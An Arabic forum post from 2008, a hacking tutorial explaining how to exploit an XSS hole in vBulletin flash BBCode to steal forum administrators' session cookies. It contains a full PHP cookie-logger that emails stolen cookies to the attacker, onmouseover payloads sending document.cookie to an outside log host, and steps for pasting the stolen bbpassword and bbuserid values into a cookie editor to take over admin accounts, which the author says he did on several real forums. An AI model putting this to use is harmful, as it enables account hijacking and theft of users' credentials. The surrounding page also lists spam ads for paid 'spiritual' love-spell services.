منتدى شارع مصر
أو إذا كنت عضو فرجاءً قم بتسجيل الدخول من هنا

منتدى شارع مصر

تجمع مصري اجراء الحورات السياسيه والنقاشات الساخنه , اكبر موقع تعليمي في مصر , تعليم دراسي ، تعليم حرفي .
 
الرئيسيةالرئيسية  س .و .جس .و .ج  بحـثبحـث  التسجيلالتسجيل  دخولدخول  
الموقع قيد الصيانة حاليا نظراً للتجديدات السنوية ... وكالة ميديا وورلد للإعلان www.mediawoorld.com
دخول
اسم العضو:
كلمة السر:
ادخلني بشكل آلي عند زيارتي مرة اخرى: 
:: لقد نسيت كلمة السر
سحابة الكلمات الدلالية
نموذج عصام المنزلية معالج روحاني مشروع السلام الرحمن مباشر اختبارات ثانوى العامة امتحان التحليل خالد التاريج الاجهزة افلام صيانة مغربي منهج احمد محمود 1992 الجديده اللغه
المواضيع الأخيرة
» لفك السحروجلب الحبيب وردالمطلقات | 0012044002936 | المطوع/ ابو حسين التيجاني
أمس في 9:53 am من طرف الجزيرة العربية

» رقم شيخ روحاني لجلب الحبيب وفك الاسحار | 0012044002936 | المطوع/ ابو حسين التيجاني
أمس في 8:01 am من طرف الجزيرة العربية

»  موقع الشيخ الروحاني المغربي لجلب الحبيب وعلاج السحر | 0012044005655 | الاستاذ الدكتور الشيخ/ ابو تميم القطري
الجمعة ديسمبر 02, 2016 2:44 pm من طرف الجزيرة العربية

» جلب الحبيب بالنظرة شيخ روحاني في الامارات دبي ابوظبي | 0012044005380 | أ.د / ابو اياد المقدسي
الأربعاء نوفمبر 30, 2016 2:22 pm من طرف الجزيرة العربية

» شيخ روحاني صادق قدملى العلاج مجانا وهذا اسمة | 0012044005380 | أ.د / ابو اياد المقدسي
الأربعاء نوفمبر 30, 2016 12:57 pm من طرف الجزيرة العربية

» جلب الحبيب في ساعة | 0016304891847 | الدكتور/ أبو الخير بو عزيزي
الأربعاء نوفمبر 30, 2016 7:05 am من طرف الجزيرة العربية

» جلب الحبيب في ساعة | 0016304891847 | الدكتور/ أبو الخير بو عزيزي
الأربعاء نوفمبر 30, 2016 6:13 am من طرف الجزيرة العربية

» شيخ روحاني في السعودية | 0012044002773 | الشيخ الروحاني/ ابو الحسن المغربي
الثلاثاء نوفمبر 29, 2016 3:35 pm من طرف الجزيرة العربية

» شيخ روحاني في السعودية | 0012044002773 | الشيخ الروحاني/ ابو الحسن المغربي
الثلاثاء نوفمبر 29, 2016 11:41 am من طرف الجزيرة العربية

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم

شاطر | 
 

 :::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل تفضل

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
امير
Admin


عدد المساهمات : 108
فعالية العضو : 0
تاريخ التسجيل : 14/07/2008
العمر : 22
الموقع : http://am1r.yoo7.com

مُساهمةموضوع: :::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل تفضل   السبت يوليو 19, 2008 11:12 am

بسم الله الرحمن الرحيم


بمنااااسبة انتهااااااء الاختبااااراااااات وبدأ الاجااااازة الصيفية حبيت اقدم لكم شرح مفصل لاحدى ثغرات xss

الا وهي ثغرة الصندوق السحري والمااسي

طبعااااا اخونا العندليب اكتشف ثغرة في الصندوقين السحري والماسي\ ثغرة الفلاش \ ثغرة الريلر بلير\ ثغرة تنسيق القصيدة\

الان بشرح لكم ثغرة الفلاش لكثرة استخدامهاااا المنتشر في المنتدياااااااات والمنتديات المصاابة بهااااا كثير للغاية بنسة 95%

وقليل اللي مرقعهاااااااا

لانهم بيقولون استغلالها صعب بس مافية شيء صعب مع الحيل والافكاااااااااااااااار ؟

طبعاااااااا الثغرة جربتها على 3 منتديات احدى المنتديات قدرت ادخل بنك الادمن وو7 مشرفين خلال ساعة ؟ طيب مايهنا ؟

الحين بشرح لكم كل شيء باختصاااااااااااار ركزوااااااااااااا؟

اقرأ العيااااااااااااااااااارة التااااااااااااالية

اقسم بالله ااااانني لااستخدمهااااااااااااااا ضد اخواني المسلمين

انا طبقت الثغرة على منتدى تريااااااااااق على نفس الادمن اعطيته موضوع لي وفية فلاش حلووو على كيفك دخل الصفحة ومرر الماوس

فقط وعلى طول جاني الكوكيز حقة مثل البرق خلال اقل من دقيقة دخلت بنكة

الادوات التي بنستخدم:

لوجو وجبت لكم لوجو جديد من برمجة اخوي ديفيل الغاااااالي


كود PHP:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******s And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=******s
[ MSG ]
Name : Attack1
******s : ******s
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get ******s Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "v0011@hotmail.com"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$*****_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$Replace******1 = array("=",";");
$Replace******2 = array("[ "," ] ");
$*****_e = str_replace($Replace******1,$Replace******2,$*****_e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log-v1@s4a.cc>";
$Msg =
"
Mr Attacker Wink ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ devil-00@hotmail.co.uk - devil.00@gmail.com ]
-----------------------------------------------
****** ::
".$*****_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>

طيب الحين ارفع الوجو على النت بس هنااااك ملاحظة::::: قبل لاترفعة على النت غير الايميل اللي بداخل اللوجو الى ايملك هنااااا

YourMail = "v0011@hotmail.com"; // Your E-mail

طبعا هذا بداخل اللوجو غيرة الى ايميلك واللي يحتاااج الى تغير هو:v0011@hotmail.com)::: هذا فقط ولما تغير الايميل سوي لة حفظ

وارفع الوجو على النت الان خلاص الوجو وانتهيناااا منه؟

الحين نجي للمهم وهو كود الثغرة وراح نطبق احدى ثغرات الصندوق والتجربة راح تكون لثغرة الفلاش؟

كود ثغرة الفلاش هووو::::


كود PHP:
[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(document.******);'[/flash]

كيفية ربط ثغرة الفلاش بالوجو وهو الاهم؟؟


انا بشرح لكم بالتفصيل على الرابط التالي عشان الكل يفهم بسرعة \


كود PHP:
[flash=http://www.arab4nokia.net/up/upload/asaa.swf]onmouseover='location.href="http://www.jms-herbs.com/log.php?nm=al-battar.net&re=http://www.tryag.com/vb/showthread.php?t=1245&id="+document.******'[/flash]



الاشياء اللي تحتااااااج الى تغيرررر على النحووو التالي \

طيب الان نمسك الكود خطوة خطوة><><><

1__ [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] هذا يااخواني رابط الفلاش اللي تبي يطلع في الصفحة مثلا لو حطيت الفلاش

في توقيعك انت على كيفك تحط الفلاش على اناشيد اسلامية او فلاش مرعب او فلاش العاب او الخخخخ على كيفك خذ لك اقرب فلاش

بالنت بس نصيحتي لك يكون حجمة قليل مو كثير عشان مايعلق بالصفحة \


2_http://www.jms-herbs.com/log.php هذا رابط اللوجوو اللي قلت لكم ارفعوة للنت غير الى الموقع اللي رفعته عليه الظاااهر مايحتاااج توضيح اكثر \

3_http://www.tryag.com/vb/showthread.php?t=1245 هذا مهم ياشباب مثلا اللي انت ناوي علية لما يمرر الماوس على الفلاش اكيد بتتغير الصفحة وبينتقل الى صفحة اخررررى انت خليك مثلي انا خليته يرجع للصفحة نفسهاااااا عشان مايشك الضحية وتقدر تغيرها لاي رابط تبي

طبعا الاخ ديفيل جزاه الله خير طور الوجو ؟؟ الوجو الاول كان لما بيمرر الضحية الماوس بينقلة الى صفحة بيضاء وهنااا بيشك الضحية بيقول وش جاب الصفحة البيضاء الحين لكن اخوي ديفل طور الوجو الثاني وترك لك الاختيار على كيفك حط اي صفحة تريد تحويل الضحية

لها عشان مايشك ابدااااااا

طيب ممكن يسال احدكم وبيقول اناحااااط الوجو في كم منتدى ولا اعرف معلومااااات الكوكيز اللي بتصل للايميل لاي منتدى ؟؟؟


الاجاااااابة : الخطوة رقم 3_http://www.tryag.com/vb/showthread.php?t=1245 اللي توهم فيها الضحية راح تجيك داخل الرسالة

اللي بتجيك على ايميلك وبكذا تعرف الكوكيز لاي منتدى ؟؟؟؟؟

طبعااااااااااا الكوكيز بيوصل لك على الايميل بالشكل التالي اللي بنحتاجة بس هووووووو::

****** ::
bblastvisit[ 1118533206 ] bblastactivity[ deleted ] bbuserid[ 4 ] bbpassword[
70c57b1de64b4bf3a98ed25886d74d10 ] bbsessionhash[
618175907d547968ee1e82b796c288ac ] bbforum_view[
ax3x-ix3yix1118527344yix35yix1118527616yix38yix11185278 05y_ ]
bbthread_lastview[ ax1x-ix1245ysx10x\"1117254496\"y_


طبعاااااااااااا لازم تكون مسجل في المنتدى اللي ناوي علية عشان تغير معلوماتك بمعلومات الضحية

bbpassword
bbuserid
bblastactivity
bblastvisit

ملاحظه بالنسة لي bblastactivity[ deleted ]

في منتدى تريااااااق مابيطلع رقم بيطلع كلمة ديليت وبكذا تكفينااااا المعلومات الباقية قلت في ترياق بس؟ على حسب اللي بيجيك على الوجو

جربت منتديات غيرهااا وماجتني كلمت ديليت جاني بدالها رقم وغيرت بنفس الرقم اللي جاني على الوجو يعني بالعربي حط اللي في الوجو بدال معلوماتك

ملاحظة قفل كل صفحااااااااااااات الاكس بلور او فاير فوكس او اي متصفح اللي تستخدمة


الان افتح برناااااامج كوكيز ايدتور ******Edit الظاااااااااااااهر البرناااااامج موجود عند الكل لانه استخدم في ثغرات من قبل؟

افتح برنااااامج ******Edit




وعلى طول اكتب اسم الموقع بجنب كلمة look for

والموقع اللي بنجرب علية ترياااااااااااااق اكتب اسم الموقع tryag.com بعدين go


الحين طلع لك زي كذا

bbpassword
bbuserid
bblastactivity
bblastvisit


ملالاحظة
bb الكل ملاحظهاااا مو كل المنتديات بيجي مثلها اقصد حرف bb اللي تبدأ فية كل كلمة لا عادي يمكن تلقى منتدى يبدأ بــ rr عااادي جداا


على حسب اللي موجود في ملف الكوفيق ؟


طيب الان غير معلوماتك بمعلوماااااااااات الضحية التي وصلت لك على الوجو كما في الصورة




وبعدين روح الان افتح المتصفح وعلى طول طير للمنتدى الضحية راح تلقى نفسك ادمن مكتوب ؟


اهلا بكم يـــــا ............... نفس ماسويت على منتدى ترياق شوف الصورة::::



طبعا الادمن اسمة: ((عذابي غير)) صاااحب موقع ترياااااااق

وتمت التجربة4 منتديات والحمد لله تم الدخول ادمن

شباب الثغرة شغال في اغلب المنتديات واستغلالها سهل للغاية انتوا شفتوا الشرح طويل انا تعمدت اطولة عشان الكل يفهم ولا هو المفروض في 8 سطور تكفية



كلمة اخيرااااااااااا اوجهها لكم : ارجو منكم عدم استخدااااااااام الثغرة في المنتديااااااات العربية



اللهم اني بغلت فاااااشهد؟


قبل لاننهي موضوعنااااااا للذين يردون ترقيع الثغرة عندي طريقة حلووووووة

وخفيفة على الكل ولا تحتاااج لخبرة

كلمة c o o k ie اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة ؟ كما تلاحظون كلمة c o o ki e جلعت بين الحروف مسااافة لاني لو كتبتها عااادية
سوف تطلع على شكل نجوم

من دون وجع راس او خوووووووووف

في طريقة ثانية للترقيع الا وهي طريقة العندليب ملف تستبدلة كاااااامل انت مخير في اي طريقة تريد

بالنسة لملف العندليب تجدونه في المنتدى؟


بالنسبة هناااااااااا ملف مظغوط موجود فية الوجو والاستثمااااااااااز

الافضل استخدم لوجو من التحميل ولاتجرب اللي في الشرح لان المنتدى بيسوي مسافات في لوجو

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

################################################## ##
################################################## ####
#########وفي الاخير تقبلوا تحياااااااااااااااااااااااااااااتي اخوكم cRiMiNaL NeT########
########ارجو من الذين ينقلون الشرح ان يحفضوا الحقوق لصااااااحبهااااااااا###########
################################################## #########
################################################## ###########
##########في امان الله لنااااااااااا لقااااااااااااء في دروس قااااااااااااادمة###################
################################################## ###############
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://egypt.forum.st
 
:::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل تفضل
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى شارع مصر :: التقنية :: الكمبيوتر والبرمجه(يشاهدة 210 زائر) :: قسم البرامج المشروحه-
انتقل الى: